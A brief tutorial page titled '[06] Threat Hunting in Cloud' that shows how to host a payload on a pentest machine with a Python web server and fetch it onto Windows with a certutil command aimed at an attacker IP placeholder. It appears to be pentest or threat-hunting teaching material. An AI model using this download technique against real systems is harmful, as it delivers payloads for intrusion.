Skip to content
[06] Threat Hunting in Cloud

[06] Threat Hunting in Cloud

By: Prasanna |

01 Hosting file in Attacker Machine

  • Host your payload in your Pentest Machine
$ python3 -m http.server

02 Download the file in Windows Machine

PS> certutil -urlcache -split -f http://<Attacker_IP>:<Port>/payload.name C:\temp\payload.name